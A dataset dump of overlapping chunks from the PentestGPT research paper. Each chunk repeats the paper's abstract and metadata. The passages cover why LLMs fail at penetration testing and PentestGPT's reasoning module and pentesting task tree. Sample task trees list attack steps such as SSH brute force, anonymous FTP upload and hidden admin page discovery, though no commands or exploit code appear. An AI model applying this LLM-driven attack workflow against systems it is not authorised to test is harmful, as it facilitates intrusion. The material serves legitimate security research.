self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 34 | walkthrough; and (2) Understanding the specific factors that prevent LLMs from successfully executing penetration tests.
We analyze the unnecessary operations prompted by LLMs by breaking down the recorded testing procedures into sub-tasks. We employ the same method to formulate benchmark sub-tasks, as Section 3 outlines. By comparing this to a standard walkthrough, we identify the primary sub- task trials that fall outside the standard walkthrough and are thus irrelevant to the penetration testing process. The results are summarized in Table 3. We find that the most prevalent unnecessary operation prompted by LLMs is brute force. For all services requiring password authentication, LLMs typically advise brute-forcing it. This is an ineffective strat- egy in penetration testing. We surmise that many hacking incidents in enterprises involve password cracking and brute force. LLMs learn these reports from accident reports and are consequently considered viable solutions. Besides brute force, LLMs suggest that testers engage in CVE studies, SQL injections, and command injections. These recommen- dations are common, as real-world penetration testers often prioritize these techniques, even though they may not always provide the exact solution. | 2308.06782#34 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 35 | We further investigate the reasons behind the failure of penetration testing trials. We manually categorize the causes of failure for the 195 penetration testing trials, with the results documented in Table 4. This table reveals that the predominant cause of failure is the loss of session context. The three examined models face difficulties in maintain- ing long-term conversational memory uniformly, frequently forgetting previous test results as the dialogue progresses. This lack of retention may be attributable to the limited token size within the LLM conversation context. Given the intricate nature of penetration testingâwhere a tester must skillfully link minor vulnerabilities across different services to develop a coherent exploitation strategyâthis loss of context substantially undermines the modelsâ effectiveness.
Finding 3: LLMs struggle to maintain long-term mem- ory, which is vital to link vulnerabilities and develop exploitation strategies effectively. | 2308.06782#35 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 36 | Finding 3: LLMs struggle to maintain long-term mem- ory, which is vital to link vulnerabilities and develop exploitation strategies effectively.
Secondly, LLMs strongly prefer the most recent tasks, adhering rigorously to a depth-first search approach. They concentrate on exploiting the immediate service, rarely devi- ating to a new target until all potential paths for the current one have been pursued. This can be attributed to the atten- tion of LLMs focusing more on the beginning and end of the prompt, as revealed in [34]. Experienced penetration testers generally assess the system from a broader standpoint, strategizing the subsequent steps likely to provide the most substantial results. When combined with the aforementioned memory loss issue, this tendency causes LLMs to become overly fixated on a specific service. As the test progresses, the models completely forget previous findings and reach a deadlock.
Finding 4: LLMs strongly prefer recent tasks and a depth-first search approach, often resulting in an over- focus on one service and forgetting previous findings.
Lastly, LLMs have inaccurate result generation and hallucination issues, as noted in [35]. This phenomenon ranks as the second most frequent cause of failures and is characterized by the generation of false commands. In our study, we observe that LLMs frequently identify the appropriate tool for the task but stumble in configuring the tools with the correct settings. In some cases, they even concoct non-existent testing tools or tool modules. | 2308.06782#36 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 37 | Finding 5: LLMs may generate inaccurate operations or commands, often stemming from inherent inaccuracies and hallucinations.
Our exploratory study of three LLMs within penetra- tion testing reveals their potential for executing end-to-end tasks. Nevertheless, challenges arise in maintaining long- term memory, devising a testing strategy beyond a depth- first approach, and generating accurate operations. In the following section, we elucidate how we address these chal- lenges and outline our strategy for designing our LLM- powered penetration testing tool.
# 5. Methodology
# 5.1. Overview
In light of the challenges identified in the preceding section, we present our proposed solution, PENTESTGPT, which leverages the synergistic interplay of three LLM- powered modules. As illustrated in Figure 3, PENTESTGPT incorporates three core modules: the Reasoning Module, the Generation Module, and the Parsing Module. Each module reserves one LLM session with its conversation and context. The user interacts seamlessly with PENTESTGPT, where distinct modules process different types of messages.
8
This interaction culminates in a final decision, suggesting the subsequent step of the penetration testing process that the user should undertake. In the following sections, we eluci- date our design reasoning and provide a detailed breakdown of the engineering processes behind PENTESTGPT.
# 5.2. Design Rationale | 2308.06782#37 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 38 | # 5.2. Design Rationale
Our central design considerations emerged from the three challenges observed in the previous Exploratory Study (Section 4): The first challenge (Finding 3) pertains to the issue of penetration testing context loss due to memory retention. LLMs in their original form struggle to maintain such long-term memory due to token size limits. The second obstacle (Finding 4) arises from the LLM chatbotsâ tendency to emphasize recent conversation content. In penetration testing tasks, this focuses on optimizing the immediate task. This approach falls short in the complex, interconnected task environment of penetration testing. The third obstacle (Finding 5) is tied to the inaccurate results generation by LLMs. When tasked to produce specific operations for a step in penetration testing directly, the outputs are often imprecise, sometimes even leading to | 2308.06782#38 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 39 | PENTESTGPT has been engineered to address these challenges, rendering it more apt for penetration testing tasks. We drew inspiration from the methodologies em- ployed by real-world penetration testing teams, where a director plans overarching procedures, subdividing them into subtasks for individual testers. Each tester independently performs their task, reporting results without an exhaustive understanding of the broader context. The director then determines the following steps, possibly redefining tasks, and triggers the subsequent round of testing. Essentially, the director manages the overall strategy without becoming entrenched in the minutiae of the tests. This approach is mirrored in PENTESTGPTâs functionality, enhancing its ef- ficiency and adaptability in conducting penetration tests. Our strategy divides penetration testing into two processes: iden- tifying the next task and generating the concrete operation to complete the task. Each process is powered by one LLM session. In this setup, the LLM session responsible for task identification retains the complete context of the ongoing penetration testing status. At the same time, the generation of detailed operations and parsing of information is managed by other sessions. This division of responsibilities fosters effective task execution while preserving the overarching context. | 2308.06782#39 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 40 | To assist LLMs in effectively carrying out penetration testing tasks, we design a series of prompts that align with user inputs. We utilize the Chain-of-Thought (CoT) [36] methodology during this process. As CoT reveals, LLMsâ performance and reasoning capabilities can be significantly enhanced using the input, chain-of-thought, output prompt- ing format. Here, the chain-of-thought represents a series of intermediate natural language reasoning steps leading to the outcome. We dissect the penetration testing tasks into micro-steps and design prompts with examples to guide LLMs through processing penetration testing information
Parsing Module Reasoning Module ' User Intention 7) FO Token Task Tree | â Subsequent | | Se Scocreseeeseee JET Ut Com Task Condenced Candidate @o âOperation | Information Tasks |. Generation _| i Testing Envrionmen| pasnpn esto can ââââ * : . . (Optional) User . Testing Targets }â Testing Tools * Verification âââ Operations Completed by LLM 7 3User Controlled Message (CJ Information to User Hidden Information
Figure 3: Overview of PENTESTGPT.
step-by-step, ultimately leading to the desired outcomes. The complete prompts are available at our anonymized open- source project [18].
# 5.3. Reasoning Module | 2308.06782#40 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 41 | step-by-step, ultimately leading to the desired outcomes. The complete prompts are available at our anonymized open- source project [18].
# 5.3. Reasoning Module
The Reasoning Module plays a pivotal role in our system, analogous to a team lead overseeing the penetration testing task from a macro perspective. It obtains testing results or intentions from the user and prepares the testing strategy for the next step. This testing strategy is passed to the generation module for further planning.
Port Scanning SSH Service Hit FTP Service t | âAnonymous Login (Succ) Web Service , nr 7 Direct Injection Point Enumeration Identification Brute Force (Fail) Hidden Admin Page Login
a) PTT Representatoin | 2308.06782#41 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 42 | a) PTT Representatoin
To effectively supervise the penetration testing process and provide precise guidance, it is crucial to translate the testing procedures and outcomes into a natural language format. Drawing inspiration from the concept of an attack tree [37], which is often used to outline penetration testing procedures, we introduce the notion of a pentesting task tree (PTT). This novel approach to testing status representation is rooted in the concept of an attributed tree [38]: Definition 1 (Attributed Tree). A attributed tree is an edge- labeled, attributed polytree G = (V, E, λ, µ) where V is a set of nodes (or vertices), E is a set of directed edges, λ : E â Σ is an edge labeling function assigning a label from the alphabet Σ to each edge and µ : (V ⪠E) à K â S is a function assigning key(from K)-value(from S) pairs of properties to the edges and nodes. | 2308.06782#42 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 43 | [Task Tree: 1. Perform port scanning (completed) - Port 21, 22 and 80 are open. - Services are FTP, SSH, and Web Service. 2. Perform the testing 2.1 Test FIP Service 2.1.1 Test Anonymous Login (success) 2.1.1.1 Test Anonymous Upload (success) 2 Test SSH Service 2.2.1 Brute-force (failed) 2.3 Test Web Service (ongoing) 2.3.1 Directory Enumeration 2.3.1.1 Find hidden admin (to-do) 2.3.2 Injection Identification (todo)
b) PTT Representation in Natural Language
Figure 4: Pentesting Task Tree in a) visualized tree format, and b) natural language format encoded in LLM.
Given the definition of attributed tree, PTT is defined as | 2308.06782#43 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 44 | Figure 4: Pentesting Task Tree in a) visualized tree format, and b) natural language format encoded in LLM.
Given the definition of attributed tree, PTT is defined as
follows: Definition 2 (Pentesting Task Tree). An PTT T is a pair (N, A), where: (1) N is a set of nodes organized in a tree structure. Each node has a unique identifier, and there is a special node called the root that has no parent. Each node, other than the root, has exactly one parent and zero or more children. (2) A is a function that assigns to each node n â N a set of attributes A(n). Each attribute is a pair (a, v), where a is the attribute name and v is the attribute value. The set of attributes can be different for each node. | 2308.06782#44 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 45 | As outlined in Figure 3, the Reasoning Moduleâs opera- tion unfolds over four key steps operating over the PTT. â¶ Initially, the module absorbs the userâs intentions to construct an initial PTT in the form of natural language. This is achieved by carefully instructing the LLM with examples and definitions of PPT using meticulously crafted prompts. The LLM outputs are parsed to confirm that the tree structure is accurately formatted. Note that due to the nature of the tree structure, it can be represented in the natural language format through layered bullets, as illustrated in Figure 4. The Reasoning Module effectively
9 | 2308.06782#45 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
